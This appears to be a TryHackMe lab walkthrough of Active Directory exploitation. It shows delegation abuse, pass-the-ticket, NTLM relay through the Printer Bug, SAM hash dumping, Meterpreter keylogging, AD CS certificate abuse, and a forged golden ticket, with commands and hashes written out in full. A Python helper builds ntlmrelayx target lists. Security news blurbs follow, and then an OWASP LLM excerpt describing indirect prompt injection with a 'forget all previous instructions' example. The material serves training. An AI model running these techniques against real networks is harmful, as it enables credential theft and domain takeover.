Ticket  : TGT_svcIIS@ZA.TRYHACKME.LOC_krbtgt~za.tryhackme.loc@ZA.TRYHACKME.LOC.kirbi
  [krb-cred]     S: krbtgt/za.tryhackme.loc @ ZA.TRYHACKME.LOC
  [krb-cred]     E: [00000012] aes256_hmac
  [enc-krb-cred] P: svcIIS @ ZA.TRYHACKME.LOC
  [enc-krb-cred] S: krbtgt/za.tryhackme.loc @ ZA.TRYHACKME.LOC
  [enc-krb-cred] T: [12/17/2024 9:08:01 AM ; 12/17/2024 7:08:01 PM] {R:12/24/2024 9:08:01 AM}
  [enc-krb-cred] F: [40e10000] name_canonicalize ; pre_authent ; initial ; renewable ; forwardable ;
  [enc-krb-cred] K: ENCRYPTION KEY 18 (aes256_hmac      ): 634f4c25dc505bcc53ee5f85790b5b1a71f30bc3775af70e49751835ed2b8f9e
[s4u2self]  t1_trevor.jones
[kdc] name: THMDC.za.tryhackme.loc (auto)
[kdc] addr: 10.200.60.101 (auto)
  > Ticket in file 'TGS_t1_trevor.jones@ZA.TRYHACKME.LOC_svcIIS@ZA.TRYHACKME.LOC.kirbi'
Service(s):
[s4u2proxy] wsman/THMSERVER1.za.tryhackme.loc
  > Ticket in file 'TGS_t1_trevor.jones@ZA.TRYHACKME.LOC_wsman~THMSERVER1.za.tryhackme.loc@ZA.TRYHACKME.LOC.kirbi'
```

Then inject the generated tickets into the current session using Mimikatz:

```
mimikatz # privilege::debug
Privilege '20' OK

mimikatz # kerberos::ptt TGS_t1_trevor.jones@ZA.TRYHACKME.LOC_wsman~THMSERVER1.za.tryhackme.loc@ZA.TRYHACKME.LOC.kirbi
* File: 'TGS_t1_trevor.jones@ZA.TRYHACKME.LOC_wsman~THMSERVER1.za.tryhackme.loc@ZA.TRYHACKME.LOC.kirbi': OK

mimikatz # kerberos::ptt TGS_t1_trevor.jones@ZA.TRYHACKME.LOC_http~THMSERVER1.za.tryhackme.loc@ZA.TRYHACKME.LOC.kirbi
* File: 'TGS_t1_trevor.jones@ZA.TRYHACKME.LOC_http~THMSERVER1.za.tryhackme.loc@ZA.TRYHACKME.LOC.kirbi': OK

mimikatz # exit
Bye!
```

Verify the ticket injection and establish a remote session. klist shows the tickets cached for t1_trevor.jones, and the WinRM session lands on THMSERVER1 as that user:

```
PS C:\Users\t2_henry.harvey> klist

Current LogonId is 0:0xf4448

Cached Tickets: (2)

#0>     Client: t1_trevor.jones @ ZA.TRYHACKME.LOC
        Server: http/THMSERVER1.za.tryhackme.loc @ ZA.TRYHACKME.LOC
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40a10000 -> forwardable renewable pre_authent name_canonicalize
        Start Time: 12/17/2024 9:10:59 (local)
        End Time:   12/17/2024 19:08:01 (local)
        Renew Time: 12/24/2024 9:08:01 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0
        Kdc Called:

        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40a10000 -> forwardable renewable pre_authent name_canonicalize
        Start Time: 12/17/2024 9:11:40 (local)
        End Time:   12/17/2024 19:08:01 (local)
        Renew Time: 12/24/2024 9:08:01 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0
        Kdc Called:

PS C:\Users\t2_henry.harvey> New-PSSession -ComputerName thmserver1.za.tryhackme.loc

 Id Name       ComputerName     ComputerType   State   ConfigurationName    Availability
 -- ----       ------------     ------------   -----   -----------------    ------------
  5 WinRM5     thmserver1.z...  RemoteMachine  Opened  Microsoft.PowerShell    Available

PS C:\Users\t2_henry.harvey> Enter-PSSession -ComputerName thmserver1.za.tryhackme.loc
[thmserver1.za.tryhackme.loc]: PS C:\Users\t1_trevor.jones\Documents> whoami
za\t1_trevor.jones
[thmserver1.za.tryhackme.loc]: PS C:\Users\t1_trevor.jones\Documents>
```

Exploiting Automated Relays

In AD, authentication requests are constantly flying around the network. Intercepting them can give an attacker access to sensitive resources, but waiting for one to happen isn't ideal; we would rather force a privileged account to authenticate to us.

Machine Account

Every Windows system in an AD environment has a machine account (effectively a user account for the computer). These accounts:

* have long, randomly generated passwords (120 UTF-16 characters) that are not realistically crackable;
* are rotated automatically every 30 days by default;
* are used by the system itself for things like syncing data, requesting certificates, and more.

A machine account can still hold privileges over other machines. This BloodHound query finds computers whose machine account is, via group membership, a local administrator on another computer:

MATCH p=(c1:Computer)-[r1:MemberOf*1..]->(g:Group)-[r2:AdminTo]->(n:Computer) RETURN p

In this lab, the THMSERVER2 machine account has administrative privileges over THMSERVER1.

The Printer Bug is a "feature" of the Windows Print Spooler service: any authenticated domain user can call its RPC interface (RpcRemoteFindFirstPrinterChangeNotificationEx) and make the machine running the spooler authenticate to any server. A quick WMI check of THMSERVER2's spooler is denied:

```
PS C:\Users\t2_henry.harvey> GWMI Win32_Printer -Computer thmserver2.za.tryhackme.loc
GWMI : Access is denied. (Exception from HRESULT: 0x80070005 (E_ACCESSDENIED))
At line:1 char:1
+ GWMI Win32_Printer -Computer thmserver2.za.tryhackme.loc
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [Get-WmiObject], UnauthorizedAccessException
    + FullyQualifiedErrorId : System.UnauthorizedAccessException,Microsoft.PowerShell.Commands.GetWmiObjectCommand
```

Access Denied here only means we cannot query the spooler over WMI; the coercion itself goes over the spooler's own RPC interface, so the attack can still proceed. What does matter is SMB signing on the relay target: if signing is required, the relayed session is rejected. Using Nmap, we confirm that signing is enabled but not required on both servers.
```
┌──(kali㉿kali)-[~/Documents/explotingad]
└─$ nmap --script=smb2-security-mode -p445 thmserver1.za.tryhackme.loc thmserver2.za.tryhackme.loc
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-17 09:12 EST
Nmap scan report for thmserver1.za.tryhackme.loc (10.200.60.201)
Host is up (0.54s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required

Nmap scan report for thmserver2.za.tryhackme.loc (10.200.60.202)
Host is up (0.30s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required

Nmap done: 2 IP addresses (2 hosts up) scanned in 11.70 seconds
```

Set up relaying. ntlmrelayx listens for incoming SMB authentication and relays it to THMSERVER1 (run it as root, with nothing else bound to port 445 on the attack box):

impacket-ntlmrelayx -smb2support -t smb://10.200.60.201 -debug

Trigger authentication. We use SpoolSample.exe to exploit the Printer Bug and force THMSERVER2 to authenticate to our attack server (10.10.57.180):

C:\Tools>SpoolSample.exe THMSERVER2.za.tryhackme.loc 10.10.57.180

THMSERVER2$ connects to our listener, ntlmrelayx relays that authentication to THMSERVER1, and because the THMSERVER2 machine account is a local administrator there, ntlmrelayx's default action dumps the local SAM:

```
ServerAdmin:500:aad3b435b51404eeaad3b435b51404ee:3279a0c6dfe15dc3fb6e9c26dd9b066c:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:92728d5173fc94a54e84f8b457af63a8:::
vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e96eab5f240174fe2754efc94f6a53ae:::
trevor.local:1001:aad3b435b51404eeaad3b435b51404ee:f48a444e1be49295eec9b84f412d92f3:::
```

These are local accounts on THMSERVER1, so the NT hash can be used directly (pass-the-hash) with evil-winrm:

evil-winrm -i 10.200.60.201 -u trevor.local -H f48a444e1be49295eec9b84f412d92f3

Exploiting Users

We will focus on two elements:

Credential Management - how users store their credentials. In AD this matters because users may have multiple sets of credentials, and remembering all of them is a hassle, so they tend to end up in files and password managers.
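An added example of my own (not from the write-up, Nmap or Impacket) that turns the signing check above into a repeatable step: it parses normal-format nmap smb2-security-mode output into a per-host signing status, decodes the raw SMB2 NEGOTIATE SecurityMode bits that the NSE script reports in prose, and emits the target list for ntlmrelayx's -tf option. The two lab hosts are copied from the scan above; the third host (the DC, where signing is required by default) is constructed to show a host that gets skipped.

```python
import re

# SMB2 NEGOTIATE SecurityMode bits (MS-SMB2 2.2.4).
SMB2_NEGOTIATE_SIGNING_ENABLED = 0x0001
SMB2_NEGOTIATE_SIGNING_REQUIRED = 0x0002

# Normal-format nmap output. The first two hosts are copied from the scan above;
# the DC entry is constructed for illustration.
SAMPLE_SCAN = """\
Nmap scan report for thmserver1.za.tryhackme.loc (10.200.60.201)
Host is up (0.54s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required

Nmap scan report for thmserver2.za.tryhackme.loc (10.200.60.202)
Host is up (0.30s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required

Nmap scan report for thmdc.za.tryhackme.loc (10.200.60.101)
Host is up (0.30s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
"""


def decode_security_mode(mode):
    """Return (signing_enabled, signing_required) from a raw SMB2 SecurityMode value."""
    return (bool(mode & SMB2_NEGOTIATE_SIGNING_ENABLED),
            bool(mode & SMB2_NEGOTIATE_SIGNING_REQUIRED))


def parse_smb_signing(nmap_output):
    """Parse normal-format nmap output into {hostname: (ip, signing_required)}.

    signing_required is None for hosts the script produced no verdict for
    (port closed, script error), so they are never treated as relayable by accident.
    """
    hosts = {}
    current = None
    for line in nmap_output.splitlines():
        m = re.match(r"Nmap scan report for (\S+)(?: \((\d+(?:\.\d+){3})\))?$", line)
        if m:
            current = m.group(1)
            hosts[current] = (m.group(2) or current, None)  # bare-IP scans have no parentheses
            continue
        m = re.match(r"\|_?\s+Message signing (.*)$", line)
        if m and current:
            ip, _ = hosts[current]
            # "enabled and required" is the only safe verdict; "enabled but not
            # required" and the "disabled" variants can all be relayed to.
            hosts[current] = (ip, "and required" in m.group(1))
    return hosts


def relay_targets(hosts):
    """Target URLs for `ntlmrelayx -tf targets.txt`: hosts where signing is not required."""
    return [f"smb://{ip}" for _, (ip, required) in sorted(hosts.items()) if required is False]


if __name__ == "__main__":
    found = parse_smb_signing(SAMPLE_SCAN)
    for name, (ip, required) in sorted(found.items()):
        print(f"{name:32} {ip:16} signing required: {required}")
    print("\n".join(relay_targets(found)))  # write this to the file passed with -tf
```

The verdict is per host, not per share: a host that requires signing rejects the relayed session no matter what you relay into it, which is why the DC drops out of the list while both member servers stay in.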
Keylogging - often, during exploitation, we need to understand how normal users interact with a system. Together with screengrabs, keylogging is a useful way to gain that understanding from an attacker's perspective.

Hunting for Credentials

```
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\trevor.local\Documents> whoami
thmserver1\trevor.local
*Evil-WinRM* PS C:\Users\trevor.local\Documents> ls

    Directory: C:\Users\trevor.local\Documents

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        4/30/2022   4:36 PM           2190 PasswordDatabase.kdbx
-a----       12/10/2024   3:02 PM           3252 shell.ps1
```

A KeePass database (.kdbx), but we need its master password.

Keylogging with Meterpreter

Meterpreter includes a built-in keylogger that can capture keystrokes. However, because our session runs as SYSTEM, the keylogger would not see the interactive user's desktop input. To fix this, we migrate the Meterpreter session into a process running as the target user.

Step 1: Identify the user's process. List processes to locate one owned by the target user (trevor.local):

```
meterpreter > ps | grep "explorer"

 PID   PPID  Name          Arch  Session  User                     Path
 ---   ----  ----          ----  -------  ----                     ----
 3612  3592  explorer.exe  x64   1        THMSERVER1\trevor.local  C:\Windows\explorer.exe
```

Step 2: Migrate to the user's process. Attach the session to the explorer.exe process of trevor.local and verify the context switch:

```
meterpreter > migrate 3612
[*] Migrating from 4408 to 3612...
[*] Migration completed successfully.
meterpreter > getuid
Server username: THMSERVER1\trevor.local
```

Step 3: Start keylogging. Enable the keylogger, then wait for the user to interact with the system; it can take a while before anything useful is typed:

```
meterpreter > keyscan_start
meterpreter > keyscan_dump
Dumping captured keystrokes...
meterpreter > keyscan_dump
Dumping captured keystrokes...
meterpreter > keyscan_dump
Dumping captured keystrokes...
keep<CR>
<Shift>Imreallysurenoonewillguessmypassword<CR>
```

The captured password opens PasswordDatabase.kdbx, which holds the flag and another set of credentials:

svcServMan: Sup3rStr0ngPass!@

Exploiting GPOs

In the previous task we got credentials from the .kdbx file. Checking that account's path in BloodHound shows a potential route:

* SVCSERVMAN@ZA.TRYHACKME.LOC has GenericWrite over the MANAGEMENT SERVER PUSHES@ZA.TRYHACKME.LOC GPO object.
* MANAGEMENT SERVER PUSHES@ZA.TRYHACKME.LOC has a GpLink to the MANAGEMENT SERVERS@ZA.TRYHACKME.LOC organizational unit, which contains THMSERVER2.ZA.TRYHACKME.LOC.
* THMSERVER2.ZA.TRYHACKME.LOC is the machine we aim to compromise.

GenericWrite: lets us modify attributes of the MANAGEMENT SERVER PUSHES object, i.e. edit the Group Policy Object and push our own settings to every machine it applies to.

GpLink: GPOs are linked to OUs, domains or sites rather than to groups; because MANAGEMENT SERVERS contains THMSERVER2, anything we put in the GPO (a scheduled task, a local group membership, a startup script) is applied on THMSERVER2 at the next policy refresh, giving code execution or a persistent backdoor there.

Start a shell as svcServMan with runas /netonly (the credentials are used only for network authentication, so the account needs no local logon rights on THMWRK1), and verify them by listing SYSVOL:

```
C:\Users\t2_henry.harvey>runas /netonly /user:za.tryhackme.loc\svcServMan cmd.exe
Enter the password for za.tryhackme.loc\svcServMan:
Attempting to start cmd.exe as user "za.tryhackme.loc\svcServMan" ...

C:\Windows\system32>dir \\za.tryhackme.loc\SYSVOL
 Volume in drive \\za.tryhackme.loc\SYSVOL is Windows
 Volume Serial Number is 1634-22A9

 Directory of \\za.tryhackme.loc\SYSVOL

04/25/2022  06:17 PM    <DIR>          .
04/25/2022  06:17 PM    <DIR>          ..
04/25/2022  06:17 PM    <JUNCTION>     za.tryhackme.loc [C:\Windows\SYSVOL\domain]
               0 File(s)              0 bytes
               3 Dir(s)  51,394,752,512 bytes free

C:\Windows\system32>
```

With the GPO modified, we connect to THMSERVER2 over SSH as colin.lane and read the flag from the Administrator's desktop:

```
┌──(kali㉿kali)-[~/Documents/explotingad]
└─$ ssh za.tryhackme.loc\\colin.lane@thmserver2.za.tryhackme.loc
The authenticity of host 'thmserver2.za.tryhackme.loc (10.200.60.202)' can't be established.
ED25519 key fingerprint is SHA256:50ZqYlTFUYKTHHPzgPNzG0gSydLnknXL0Ea7lUs7tT8.
This host key is known by the following other names/addresses:
    ~/.ssh/known_hosts:17: [hashed name]
    ~/.ssh/known_hosts:26: [hashed name]
    ~/.ssh/known_hosts:32: [hashed name]
    ~/.ssh/known_hosts:33: [hashed name]
    ~/.ssh/known_hosts:34: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'thmserver2.za.tryhackme.loc' (ED25519) to the list of known hosts.
za.tryhackme.loc\colin.lane@thmserver2.za.tryhackme.loc's password:
Microsoft Windows [Version 10.0.17763.1098]
(c) 2018 Microsoft Corporation. All rights reserved.

za\colin.lane@THMSERVER2 C:\Users\colin.lane>cd /Users
za\colin.lane@THMSERVER2 C:\Users>cd Administrator
za\colin.lane@THMSERVER2 C:\Users\Administrator>cd Desktop
za\colin.lane@THMSERVER2 C:\Users\Administrator\Desktop>ls
'ls' is not recognized as an internal or external command,
operable program or batch file.
za\colin.lane@THMSERVER2 C:\Users\Administrator\Desktop>dir
 Volume in drive C is Windows
 Volume Serial Number is 1634-22A9

 Directory of C:\Users\Administrator\Desktop

06/16/2022  10:35 AM    <DIR>          .
06/16/2022  10:35 AM    <DIR>          ..
06/16/2022  06:48 PM                39 flag4.txt
06/16/2022  10:35 AM           104,407 templates.txt
               2 File(s)        104,446 bytes
               2 Dir(s)  51,880,484,864 bytes free
za\colin.lane@THMSERVER2 C:\Users\Admini
```

Exploiting Certificates

AD Certificate Services

Active Directory Certificate Services (AD CS) is Microsoft's Public Key Infrastructure (PKI) implementation. It manages the digital certificates used for things like encrypting data, signing documents, and authenticating users.

Certificate Templates simplify issuing certificates: they are predefined sets of rules that control what a certificate can be used for and who can request one. Normally administrators configure these templates carefully so that ordinary users do not get more than they need; when they do not, a template becomes a path to impersonating any account in the domain.
Key Concepts

* PKI (Public Key Infrastructure): the system for managing digital certificates and public-key encryption; it lets parties verify the identity of users or systems.
* AD CS (Active Directory Certificate Services): Microsoft's PKI implementation, a Windows Server role (it does not have to run on a domain controller) that issues and manages certificates for the domain.
* CA (Certificate Authority): the entity that issues certificates.
* Certificate Template: a predefined configuration that specifies how and when a certificate can be issued, and to whom.
* CSR (Certificate Signing Request): a request sent to the CA to sign a certificate.
* EKU (Enhanced Key Usage): object identifiers specifying what a certificate may be used for (for example Client Authentication).

Identifying Vulnerable Certificate Templates

Enumerating templates: use certutil to dump all configured certificate templates to a file:

certutil -Template -v > templates.txt

Identifying misconfigurations: look for templates with a dangerous combination of settings:

* Client Authentication EKU: the certificate can be used to authenticate as a principal, and therefore to obtain a Kerberos TGT through PKINIT.
* CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT: the requester defines the certificate's Subject and Subject Alternative Name (SAN), so they can put another user's UPN in it.
* CTPRIVATEKEY_FLAG_EXPORTABLE_KEY: the certificate can be exported together with its private key.
* Permissions: a principal we control has enrollment rights on the template.

Also check that the template does not require manager approval or an authorized signature; if it does, the request is parked pending approval rather than issued.

Exploiting a Certificate Template (following the TryHackMe room's steps): use the Microsoft Management Console (MMC, Certificates snap-in) to request a certificate from the vulnerable template. In the request, set the Common Name to any value and add a User Principal Name alternative name for the account to impersonate (e.g. Administrator@za.tryhackme.loc), then click Enroll. Export the issued certificate with its private key (PFX); the private key is required to authenticate as that user.
Inject the certificate with Rubeus. asktgt performs PKINIT with the certificate and returns a TGT for the UPN it carries:

Rubeus.exe asktgt /user:Administrator /enctype:aes256 /certificate:<path to certificate> /password:<certificate file password> /outfile:<name of file to write TGT to> /domain:za.tryhackme.loc /dc:<IP of domain controller>

Use Mimikatz to pass the ticket:

```
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # kerberos::ptt admin.kirbi
* File: 'administrator.kirbi': OK
mimikatz # exit
```

Exploiting Domain Trust

za.tryhackme.loc is a child domain of tryhackme.loc. Inside a forest, SID filtering does not apply to the parent-child trust, so a TGT forged with the child's krbtgt key can carry the parent's Enterprise Admins SID (RID 519) in its SID history and will be honored across the whole forest.

Obtain the child domain's krbtgt hash with DCSync:

```
mimikatz # privilege::debug
mimikatz # lsadump::dcsync /user:za\krbtgt
```

Collect the two SIDs needed: the child domain SID (the SID of any domain object with its trailing RID removed) and the Enterprise Admins group SID, read from the root DC:

```
PS C:\> Get-ADComputer -Identity "THMDC"
PS C:\> Get-ADGroup -Identity "Enterprise Admins" -Server thmrootdc.tryhackme.loc
```

Forge the golden ticket. /sid must be the child domain SID without a RID (S-1-5-21-3885271727-2693558621-2658995185, as shown in the lsadump::secrets output earlier; appending an object's RID here produces an invalid ticket), /rc4 is the krbtgt hash from DCSync, and /sids adds the parent's Enterprise Admins SID to the ticket's SID history:

```
mimikatz # privilege::debug
mimikatz # kerberos::golden /user:Administrator /domain:za.tryhackme.loc /sid:S-1-5-21-3885271727-2693558621-2658995185 /service:krbtgt /rc4:4b6e725cc6bfc18ca1c77a1de77c5b95 /sids:S-1-5-21-3330634377-1326264276-632209373-519 /ptt
```

Verify the injected ticket:

C:\>dir \\thmdc.za.tryhackme.loc\c$

by HACKLIDO

Many professionals juggle multiple document formats, leading to confusion and wasted time. Imagine a streamlined process that simplifies…

by Hackread

The Cybersecurity and Infrastructure Security Agency (CISA) has issued a call to action for individuals in sensitive roles, such as senior government and political positions, to adopt encrypted communication platforms. This comes in response to espionage activities linked to People's Republic of China (PRC) state-affiliated actors targeting telecommunications infrastructure to intercept sensitive information. CISA's report … The post CISA Urges Public to Use Encrypted Messaging Amid Espionage Risks appeared first on CyberInsider.

by Cyber Insider

An ongoing phishing scam is abusing Google Calendar invites and Google Drawings pages to steal credentials while bypassing spam filters. [...]

by BleepingComputer

Attackers are using links to the popular Google scheduling app to lead users to pages that steal credentials, with the ultimate goal of committing financial fraud.

by Dark Reading

Pegasus spyware has been infamous for infecting the phones of journalists, activists, human rights organizations, and dissidents globally. iVerifyBasic helped me scan my phone for spyware in just 5 minutes.

by ZDNET Security

Having been at ActiveState for nearly eight years, I’ve seen many iterations of our product. However, one thing has stayed true over the years: Our commitment to the open source community and companies using open source in their code. ActiveState has been helping enterprises manage open source for over a decade. In the early days, open source was in its infancy. We focused mainly on the

by The Hacker News

Cyberattackers used fake DocuSign links and HubSpot forms to try to solicit Azure cloud logins from hundreds of thousands of employees across Europe.

by Dark Reading

The accounts pushed an anti-Qatar campaign and messages about Islamism The post Inauthentic X accounts targeted American and Canadian politicians amid student protests appeared first on DFRLab.

by DFRLab

See how the new Malware Detection feature for Barracuda Cloud-to-Cloud Backup works and how it can help you.

by Barracuda

​​Ukrainian national Mark Sokolovsky was sentenced today to five years in prison for his involvement in the Raccoon Stealer malware cybercrime operation. [...]

by BleepingComputer

Some of our customers are reporting “Threat Alerts” from Mimecast stating hackers have exploited KnowBe4 or KnowBe4 domains to send email threats.

by KnowBe4

The Russian hacking group tracked as APT29 (aka "Midnight Blizzard") is using a network of 193 remote desktop protocol proxy servers to perform man-in-the-middle (MiTM) attacks to steal data and credentials and to install malicious payloads. [...]

by BleepingComputer

A hack on UnitedHealth-owned tech giant Change Healthcare likely stands as one of the biggest data breaches of U.S. medical data in history.

by TechCrunch

The Russia-linked APT29 threat actor has been observed repurposing a legitimate red teaming attack methodology as part of cyber attacks leveraging malicious Remote Desktop Protocol (RDP) configuration files. The activity, which has targeted governments and armed forces, think tanks, academic researchers, and Ukrainian entities, entails adopting a "rogue RDP" technique that was previously

by The Hacker News

Analysis of more than 580,000 comments shows pattern of narrative attacks amplified via coordinated behavior; additional instances appeared in Facebook comments The post How inauthentic accounts exploit Telegram comments to spread anti-Ukrainian narratives appeared first on DFRLab.

by DFRLab

San Francisco startup scores a Series B round to thwart money mule accounts, deep-fake identities, account takeovers and payment fraud. The post Bureau Raises $30M to Tackle Deepfakes, Payment Fraud appeared first on SecurityWeek.

by SecurityWeek

New details emerged about the Change Healthcare ransomware attack in Nebraska's complaint.

by TechCrunch

Cybersecurity researchers are warning about a new breed of investment scam that combines AI-powered video testimonials, social media malvertising, and phishing tactics to steal money and personal data.

by KnowBe4

An email phishing campaign is targeting popular YouTube creators with phony collaboration offers, according to researchers at CloudSEK. The emails contain OneDrive links designed to trick users into installing malware.

by KnowBe4

The U.S. government is considering banning TP-Link routers starting next year if ongoing investigations find that their use in cyberattacks poses a national security risk. [...]

by BleepingComputer

Across small-to-medium enterprises (SMEs) and managed service providers (MSPs), the top priority for cybersecurity leaders is to keep IT environments up and running. To guard against cyber threats and prevent data breaches, it’s vital to understand the current cybersecurity vendor landscape and continually assess the effectiveness of available solutions. Luckily, the 2024 MITRE ATT&CK

by The Hacker News

Pallet liquidation is an attractive playing field for online scammers. Will you receive goods or get your credit card details stolen?

by Malwarebytes Labs

The Dutch Data Protection Authority (Autoriteit Persoonsgegevens, AP) has fined Netflix €4.75 million for failing to adequately inform customers about the processing of their personal data between 2018 and 2020. The investigation, initiated in 2019 after complaints from the Austrian privacy group noyb (None of Your Business), revealed shortcomings in Netflix's privacy policies and responses … The post Netflix Fined €4.75 Million by Dutch Data Protection Authority Over GDPR Violations appeared first on CyberInsider.

by Cyber Insider

KEY SUMMARY POINTS Cybersecurity researchers Dr. Web have uncovered a new and active Linux malware campaign aimed at…

by Hackread

Three months after Telegram's controversial policy changes fueled by the arrest of its CEO, Pavel Durov, predictions of a cybercriminal migration to alternative platforms have largely fallen flat. Despite initial outrage among threat actors, Telegram remains the dominant platform for cybercrime activities, with only minor exploration of alternatives such as Signal, Discord, and others. Telegram's … The post Telegram's Dominance in Cybercrime Persists Despite Policy Shift appeared first on CyberInsider.

by Cyber Insider

Unit 42 researchers have uncovered an ongoing phishing campaign targeting European companies, particularly in Germany and the UK. The attacks began in June 2024 and persisted as late as September 2024. The campaign used fraudulent forms hosted on HubSpot's Free Form Builder service to harvest credentials, enabling attackers to compromise Microsoft Azure cloud environments. Approximately … The post Threat Actors Exploit HubSpot to Harvest Microsoft Azure Credentials appeared first on CyberInsider.

by Cyber Insider

The Russian government accuses the US threat-intel firm of participating in the collection and analysis of data on the actions of Russia's armed forces. The post Recorded Future Tagged as 'Undesirable' in Russia appeared first on SecurityWeek.

by SecurityWeek

Working closely with CISOs, chief financial officers can become key players in protecting their organizations' critical assets and ensuring long-term financial stability.

by Dark Reading

In the cloud, security is a true balancing act. We have written about the challenge of making both on-prem and... The post How a financial leader used the power of the Sysdig platform appeared first on Sysdig.

by Sysdig

We’re officially in the final days of 2024, a year so eventful it feels difficult to remember half of what... The post Refresh yourself on 2024’s top cyber attack trends to stay safe in 2025 appeared first on Sysdig.

by Sysdig

Open-source tools like Grafana Labs and AI-driven AIOps are shaking up incident management, challenging PagerDuty and streamlining IT problem-solving and code fixes. Here''s why it matters.

by ZDNET Security

BeyondTrust has disclosed details of a critical security flaw in Privileged Remote Access (PRA) and Remote Support (RS) products that could potentially lead to the execution of arbitrary commands. Privileged Remote Access controls, manages, and audits privileged accounts and credentials, offering zero trust access to on-premises and cloud resources by internal, external, and third-party users.

by The Hacker News

INTERPOL is calling for a linguistic shift that aims to put an end to the term "pig butchering," instead advocating for the use of "romance baiting" to refer to online scams where victims are duped into investing in bogus cryptocurrency schemes under the pretext of a romantic relationship. "The term 'pig butchering' dehumanizes and shames victims of such frauds, deterring people from coming

by The Hacker News

The Russian-based attack group uses legitimate red-team tools, 200 domain names, and 34 back-end RDP servers, making it harder to identify and block malicious activity.

by Dark Reading

The cybersecurity startup''s data loss protection platform uses contextual redaction to help organizations safely use private business information across AI platforms.

by Dark Reading

Learn about autonomous SOC and how SentinelOne uses a maturity model to frame the shifts it will bring to day-to-day security operations. The post Autonomous SOC Is a Journey, Not a Destination | Introducing The Autonomous SOC Maturity Model appeared first on SentinelOne.

by SentinelOne

With AI, it''s not only the sky that''s the limit, it''s the entire universe.

by Malwarebytes Labs

For the last couple of years, a lot of attention has been placed on the evolutionary state of artificial intelligence (AI) technology and its impact on cybersecurity. In many industries, the risks associated with AI-generated attacks are still present and concerning, especially with the global average of data breach costs increasing by 10% from last […] The post Cloud Threat Landscape Report: AI-generated attacks low for the cloud appeared first on Security Intelligence.

by Security Intelligence

Over the last few months, the topic of email bombing has been brought to our attention multiple times, mostly queries from customers that go something like this:

by SpiderLabs Blog

This post first appeared on blog.netwrix.com and was written by Jonathan Blackwell.Windows PowerShell and command prompt (CMD) are both essential command-line interface tools for Windows administrators, allowing them to execute commands, manage system processes and automate administrative tasks. While CMD has been a foundational component of Windows since the MS-DOS era, PowerShell has emerged as a more advanced and powerful scripting language, enhancing system management and … Continued

by Netwrix

Network analysis reveals communities and key users, each playing distinct roles in amplifying pro-Russia and pro-China messaging The post Foreign narratives proliferate among Japanese X communities appeared first on DFRLab.

by DFRLab

Gain insight into how Dutch school district CVO Rotterdam e.o. is taking steps to ensure it has technical solutions in place that will help it comply with the new Normenkader Funderend Onderwijs (NFO) regulations with the help of Barracuda's security platform.

by Barracuda

The OWASP Top 10 for LLMs 2025: How GenAI Risks Are Evolving

Manjesh S., Wed, 12/18/2024 - 10:16

Here is HackerOne's perspective on the Top 10 list for LLM vulnerabilities, how the list has changed, and what solutions can help secure against these risks.

The OWASP Top 10 for LLMs: 2024 vs. 2025

2024 | Change | 2025
LLM01: Prompt Injection | No change | LLM01: Prompt Injection
LLM02: Insecure Output Handling | ↓3 | LLM02: Sensitive Information Disclosure
LLM03: Training Data Poisoning | ↓1 | LLM03: Supply Chain Vulnerabilities
LLM04: Model Denial of Service | ✕ | LLM04: Data and Model Poisoning
LLM05: Supply Chain Vulnerabilities | ↑2 | LLM05: Improper Output Handling
LLM06: Sensitive Information Disclosure | ↑4 | LLM06: Excessive Agency
LLM07: Insecure Plugin Design | ✕ | LLM07: System Prompt Leakage
LLM08: Excessive Agency | ↑2 | LLM08: Vector and Embedding Weaknesses
LLM09: Overreliance | ✕ | LLM09: Misinformation
LLM10: Model Theft | ✕ | LLM10: Unbounded Consumption

(The Change column describes the 2024 entry in that row: an arrow gives how far it moved in the 2025 ranking, and ✕ marks an entry that was dropped or folded into a new category.)

LLM01: Prompt Injection
Position change: None

What Is Prompt Injection?
One of the most commonly discussed LLM vulnerabilities, Prompt Injection occurs when an attacker manipulates the operation of a trusted LLM through crafted inputs, either directly or indirectly. For example, an attacker leverages an LLM to summarize a webpage containing a malicious, indirect prompt injection. The injection contains "forget all previous instructions" and new instructions to query private data stores, leading the LLM to disclose sensitive or private information.

Solutions to Prompt Injection
Several actions can contribute to preventing Prompt Injection vulnerabilities, including:
- Enforcing privilege control on LLM access to the backend system
- Segregating external content from user prompts
- Keeping humans in the loop for extensible functionality

LLM02: Sensitive Information Disclosure
Position change: ↑4

What Is Sensitive Information Disclosure?
